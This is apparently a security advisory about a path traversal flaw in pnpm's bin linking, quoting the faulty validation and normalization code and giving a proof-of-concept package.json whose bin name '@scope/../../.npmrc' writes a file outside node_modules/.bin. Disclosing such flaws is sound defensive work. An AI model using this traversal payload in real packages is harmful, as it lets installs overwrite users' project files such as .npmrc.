A path traversal vulnerability in pnpm's bin linking allows malicious npm packages to create executable shims or symlinks outside of node_modules/.bin. Bin names starting with @ bypass validation, and after scope normalization, path traversal sequences like ../../ remain intact.
The vulnerability exists in the bin name validation and normalization logic:
1. Validation Bypass (pkg-manager/package-bins/src/index.ts)
The filter allows any bin name starting with @ to pass through without validation:
.filter((commandName) =>
encodeURIComponent(commandName) === commandName ||
commandName === '' ||
commandName[0] === '@' // <-- Bypasses validation
)
2. Incomplete Normalization (pkg-manager/package-bins/src/index.ts)
function normalizeBinName (name: string): string {
return name[0] === '@' ? name.slice(name.indexOf('/') + 1) : name
}
// Input: @scope/../../evil
// Output: ../../evil <-- Path traversal preserved!
3. Exploitation (pkg-manager/link-bins/src/index.ts:288)
The normalized name is used directly in path.join() without validation.
Create a malicious package:
{
"name": "malicious-pkg",
"version": "1.0.0",
"bin": {
"@scope/../../.npmrc": "./malicious.js"
}
}
Install the package:
pnpm add /path/to/malicious-pkg
Observe .npmrc created in project root (outside node_modules/.bin).
Verified on pnpm main @ commit 5a0ed1d45.
{
"github_reviewed_at": "2026-01-26T21:02:39Z",
"nvd_published_at": "2026-01-26T22:15:56Z",
"cwe_ids": [
"CWE-23"
],
"severity": "MODERATE",
"github_reviewed": true
}